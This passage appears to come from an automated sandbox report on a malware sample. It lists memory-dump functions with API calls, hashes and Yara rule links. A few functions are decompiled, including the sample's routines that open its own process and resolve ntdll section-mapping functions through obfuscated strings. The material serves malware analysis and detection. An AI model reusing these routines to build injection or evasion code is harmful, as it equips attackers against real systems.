                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7133
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7153
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7160
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  • Opcode ID: 8dd4ab68795b39779b7de57faeda79ba1cf029777b44b54c1716fdb435393f86
                                                                                                                                  • Instruction ID: d3072330960547199b362faec9aadacbab48c2a9231d1105a0f0f00114bc342f
                                                                                                                                  • Opcode Fuzzy Hash: 8dd4ab68795b39779b7de57faeda79ba1cf029777b44b54c1716fdb435393f86
                                                                                                                                  • Instruction Fuzzy Hash: CE01C031900629DBCB05DBE8C854AEE7B79BF85398F100D19D4106B3D0DF759A4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F703C, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7043
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F704D
                                                                                                                                  • int.LIBCPMT ref: 6E8F7064
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E8F7087
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F709E
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F70BE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F70CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  • Opcode ID: 55ef7c9dd6b6de0c4e6d0ac31c61b1e63597cc5dea8ff30398bdeb1729b69e24
                                                                                                                                  • Instruction ID: 264cdc5e337131cf339e9bbeb1742473a471e8911adbd283bd1e28088eed1f31
                                                                                                                                  • Opcode Fuzzy Hash: 55ef7c9dd6b6de0c4e6d0ac31c61b1e63597cc5dea8ff30398bdeb1729b69e24
                                                                                                                                  • Instruction Fuzzy Hash: 6D01C071900629CBDB01DBE8C954AEEB7B9AF85398F210D09D410AB2C0DF759A4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F71FB, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7202
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F720C
                                                                                                                                  • int.LIBCPMT ref: 6E8F7223
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F7246
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F725D
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F727D
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F728A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  • Opcode ID: 1f127ce60920df6713edb1541b961e929026db84eb92eb12b029d0ae222fcbec
                                                                                                                                  • Instruction ID: e247fed4c3f7dca50aa7dbcf80a409e2c6dd58ccca5fd89bf62d336557d77251
                                                                                                                                  • Opcode Fuzzy Hash: 1f127ce60920df6713edb1541b961e929026db84eb92eb12b029d0ae222fcbec
                                                                                                                                  • Instruction Fuzzy Hash: 3401C03190061ACFDF01DBE8C954AED777ABF953A8F104D09E4116B2C0EFB49A4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7166, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F716D
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7177
                                                                                                                                  • int.LIBCPMT ref: 6E8F718E
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F71B1
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F71C8
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F71E8
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F71F5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  • Opcode ID: 61883fc5aa5009a8ff41e77d5df48e72ef902dad1a2e25938c11b7e42595240e
                                                                                                                                  • Instruction ID: 66861b4c4daa53462445daf66dd568f8a41f57f35afe14351c776ccdc441471b
                                                                                                                                  • Opcode Fuzzy Hash: 61883fc5aa5009a8ff41e77d5df48e72ef902dad1a2e25938c11b7e42595240e
                                                                                                                                  • Instruction Fuzzy Hash: 30010031900619CBDF01DBE8C954AEDBBBAAF91398F114D09D4106B2C0DF709A4B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A1A24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A1A24(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x31ad2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x31ad294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0x31ad290 = _t6;
					 *0x31ad29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x31ad28c = _t7;
					if(_t7 == 0) {
						 *0x31ad28c =  *0x31ad28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                                                                                                  0x031a1a2c
                                                                                                                                  0x031a1a32
                                                                                                                                  0x031a1a39
                                                                                                                                  0x00000000
                                                                                                                                  0x031a1a93
                                                                                                                                  0x031a1a3b
                                                                                                                                  0x031a1a43
                                                                                                                                  0x031a1a50
                                                                                                                                  0x031a1a50
                                                                                                                                  0x031a1a90
                                                                                                                                  0x00000000
                                                                                                                                  0x031a1a90
                                                                                                                                  0x031a1a52
                                                                                                                                  0x031a1a52
                                                                                                                                  0x031a1a57
                                                                                                                                  0x031a1a69
                                                                                                                                  0x031a1a6e
                                                                                                                                  0x031a1a74
                                                                                                                                  0x031a1a7a
                                                                                                                                  0x031a1a81
                                                                                                                                  0x031a1a83
                                                                                                                                  0x031a1a83
                                                                                                                                  0x00000000
                                                                                                                                  0x031a1a8a
                                                                                                                                  0x031a1a4c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a1a4e
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,031A2669,?,?,00000001,?,?,?,031A1900,?), ref: 031A1A2C
                                                                                                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,031A1900,?), ref: 031A1A3B
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,031A1900,?), ref: 031A1A57
                                                                                                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,031A1900,?), ref: 031A1A74
                                                                                                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,031A1900,?), ref: 031A1A93
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 2270775618-3251738875
                                                                                                                                  • Opcode ID: 6318a97415918d3b52769ab963c6800876c4bb589b006922f15336bbb9d71cad
                                                                                                                                  • Instruction ID: 0aba412c66ea410d15c4c1e6c68b79bb20febc548d4d2ae4d6199b89da053e2d
                                                                                                                                  • Opcode Fuzzy Hash: 6318a97415918d3b52769ab963c6800876c4bb589b006922f15336bbb9d71cad
                                                                                                                                  • Instruction Fuzzy Hash: 0DF08C7C640F42BBD728EB38AA2A7293BA6A74C753F08552AE506C61C8D770C0C1DF75
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A1A9C, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 031A1AF6
                                                                                                                                  • SysAllocString.OLEAUT32(0070006F), ref: 031A1B0A
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 031A1B1C
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A1B84
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A1B93
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A1B9E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 344208780-0
                                                                                                                                  • Opcode ID: 0193de701557b828dfbf1e896923c14b56456d70c1b2f5dd39aa42f173b80389
                                                                                                                                  • Instruction ID: 6cece0be817b3708be6db19f2e224a999a83a5be92d9c03674c28058d5368bc0
                                                                                                                                  • Opcode Fuzzy Hash: 0193de701557b828dfbf1e896923c14b56456d70c1b2f5dd39aa42f173b80389
                                                                                                                                  • Instruction Fuzzy Hash: C341503A900A09AFDB01EFBCD944AEEB7B9AF4D312F144466E914EB110DB719905CBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A4837, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A4837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E031A75F6(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x31ad2e0; // 0x2a2a5a8
					_t1 = _t23 + 0x31ae11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x31ad2e0; // 0x2a2a5a8
					_t2 = _t26 + 0x31ae782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E031A4AAB(_t54);
					} else {
						_t30 =  *0x31ad2e0; // 0x2a2a5a8
						_t5 = _t30 + 0x31ae76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x31ad2e0; // 0x2a2a5a8
							_t7 = _t33 + 0x31ae4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x31ad2e0; // 0x2a2a5a8
								_t9 = _t36 + 0x31ae406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x31ad2e0; // 0x2a2a5a8
									_t11 = _t39 + 0x31ae792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E031A9269(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                                                                                                  0x031a4846
                                                                                                                                  0x031a484a
                                                                                                                                  0x031a490c
                                                                                                                                  0x031a4850
                                                                                                                                  0x031a4850
                                                                                                                                  0x031a4855
                                                                                                                                  0x031a4868
                                                                                                                                  0x031a486a
                                                                                                                                  0x031a486f
                                                                                                                                  0x031a4877
                                                                                                                                  0x031a487e
                                                                                                                                  0x031a4880
                                                                                                                                  0x031a4885
                                                                                                                                  0x031a4904
                                                                                                                                  0x031a4905
                                                                                                                                  0x031a4887
                                                                                                                                  0x031a4887
                                                                                                                                  0x031a488c
                                                                                                                                  0x031a4894
                                                                                                                                  0x031a4896
                                                                                                                                  0x031a489b
                                                                                                                                  0x00000000
                                                                                                                                  0x031a489d
                                                                                                                                  0x031a489d
                                                                                                                                  0x031a48a2
                                                                                                                                  0x031a48aa
                                                                                                                                  0x031a48ac
                                                                                                                                  0x031a48b1
                                                                                                                                  0x00000000
                                                                                                                                  0x031a48b3
                                                                                                                                  0x031a48b3
                                                                                                                                  0x031a48b8
                                                                                                                                  0x031a48c0
                                                                                                                                  0x031a48c2
                                                                                                                                  0x031a48c7
                                                                                                                                  0x00000000
                                                                                                                                  0x031a48c9
                                                                                                                                  0x031a48c9
                                                                                                                                  0x031a48ce
                                                                                                                                  0x031a48d6
                                                                                                                                  0x031a48d8
                                                                                                                                  0x031a48dd
                                                                                                                                  0x00000000
                                                                                                                                  0x031a48df
                                                                                                                                  0x031a48e5
                                                                                                                                  0x031a48ea
                                                                                                                                  0x031a48f1
                                                                                                                                  0x031a48f6
                                                                                                                                  0x031a48fb
                                                                                                                                  0x00000000
                                                                                                                                  0x031a48fd
                                                                                                                                  0x031a4900
                                                                                                                                  0x031a4900
                                                                                                                                  0x031a48fb
                                                                                                                                  0x031a48dd
                                                                                                                                  0x031a48c7
                                                                                                                                  0x031a48b1
                                                                                                                                  0x031a489b
                                                                                                                                  0x031a4885
                                                                                                                                  0x031a491a

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,031A101C,?,00000001,?,?,00000000,00000000), ref: 031A485C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 031A487E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 031A4894
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 031A48AA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 031A48C0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 031A48D6
                                                                                                                                    • Part of subcall function 031A9269: memset.NTDLL ref: 031A92E8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1886625739-0
                                                                                                                                  • Opcode ID: 23f4330191f0a4eabcc08b597e9937388a34e2c997e95cc121dda885cafb3aa5
                                                                                                                                  • Instruction ID: 0c3879f71fe24136690b95484ad1cbd5de0443c4e93a58936c53fe19cb870791
                                                                                                                                  • Opcode Fuzzy Hash: 23f4330191f0a4eabcc08b597e9937388a34e2c997e95cc121dda885cafb3aa5
                                                                                                                                  • Instruction Fuzzy Hash: 55212AB9504E0AAFDB10EF6ED944D6ABBECEF4C2527154026E545C7201DBB4E905CBB0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8FE16B, Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 6E8FE172
                                                                                                                                  • _Maklocstr.LIBCPMT ref: 6E8FE1DB
                                                                                                                                  • _Maklocstr.LIBCPMT ref: 6E8FE1ED
                                                                                                                                  • _Maklocchr.LIBCPMT ref: 6E8FE205
                                                                                                                                  • _Maklocchr.LIBCPMT ref: 6E8FE215
                                                                                                                                  • _Getvals.LIBCPMT ref: 6E8FE237
                                                                                                                                    • Part of subcall function 6E8F688C: _Maklocchr.LIBCPMT ref: 6E8F68BB
                                                                                                                                    • Part of subcall function 6E8F688C: _Maklocchr.LIBCPMT ref: 6E8F68D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3549167292-0
                                                                                                                                  • Opcode ID: 8600820448067cb0dd03198f472609bb8880dff0a8404b35a4a2e98b30a60a6a
                                                                                                                                  • Instruction ID: feea8bc94a24eab6035c6be7887af6534faf9f5e9c750b764e7b2cb37d91e825
                                                                                                                                  • Opcode Fuzzy Hash: 8600820448067cb0dd03198f472609bb8880dff0a8404b35a4a2e98b30a60a6a
                                                                                                                                  • Instruction Fuzzy Hash: 62216D71C00318EBDF149FE9D844ACE7BACAF04394F00895AB9149F281EB70D641CBE1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F74E4, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F74EB
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F74F5
                                                                                                                                  • int.LIBCPMT ref: 6E8F750C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7546
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7566
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7573
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 25fad046ceb2f7b5a008cadd37196c78755ddaeeb5d3a4833d2a29d63f13869d
                                                                                                                                  • Instruction ID: 34f9cb2eb7e1a53f49ae4d7b180456944fb66bd3ca719060b5c60e0a9faa813f
                                                                                                                                  • Opcode Fuzzy Hash: 25fad046ceb2f7b5a008cadd37196c78755ddaeeb5d3a4833d2a29d63f13869d
                                                                                                                                  • Instruction Fuzzy Hash: D701AD31900619DBCF01DFE8C9946ED77BABF893A8F104D09D4106B2D0DB749A4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1C01, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1C08
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1C12
                                                                                                                                  • int.LIBCPMT ref: 6E8F1C29
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1C63
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1C83
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1C90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 5a6457df432cc98f853bdf4401d9c4f0d01b87e6d92241c7b93ab68ebec466c9
                                                                                                                                  • Instruction ID: 687f0951bfd0439b76c408f6957bb9d76060093753be17834022809df6ba4f4d
                                                                                                                                  • Opcode Fuzzy Hash: 5a6457df432cc98f853bdf4401d9c4f0d01b87e6d92241c7b93ab68ebec466c9
                                                                                                                                  • Instruction Fuzzy Hash: 3001C071900629DBCF01DBE8C9946EE7BBAAF953A8F214D09D4106B2D0DF74994B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E90542D, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905434
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E90543E
                                                                                                                                  • int.LIBCPMT ref: 6E905455
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E90548F
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9054AF
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9054BC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 2e3d9b5e614596478b2d58c0a03dd3d4266507f849a0fff731bdc97f97e7be01
                                                                                                                                  • Instruction ID: ab319acd7c58b8e86f78001e60258415b5bd8c7d68848f3722878d30224a8a3b
                                                                                                                                  • Opcode Fuzzy Hash: 2e3d9b5e614596478b2d58c0a03dd3d4266507f849a0fff731bdc97f97e7be01
                                                                                                                                  • Instruction Fuzzy Hash: 5401AD7190061ADBCF11DBE8C994AEDB7BAAF95368F500D0DE4106B390DB74DD468B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F744F, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7456
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7460
                                                                                                                                  • int.LIBCPMT ref: 6E8F7477
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F74B1
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F74D1
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F74DE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 69a908fb878165c8ffad0055af2bee8568e35e440cdc7bcd946674bd97c6edb6
                                                                                                                                  • Instruction ID: 2faab873dd4532f43786987a34caeb2c1b898982d612ab398ee881bbfa47b377
                                                                                                                                  • Opcode Fuzzy Hash: 69a908fb878165c8ffad0055af2bee8568e35e440cdc7bcd946674bd97c6edb6
                                                                                                                                  • Instruction Fuzzy Hash: 6E010031900629DBCF01DBE8C9546EE7B7ABF917A8F200C19E410BB2C0DF75994B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7C75, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7C7C
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7C86
                                                                                                                                  • int.LIBCPMT ref: 6E8F7C9D
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7CD7
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7CF7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7D04
                                                                                                                                  Memory Dump Source
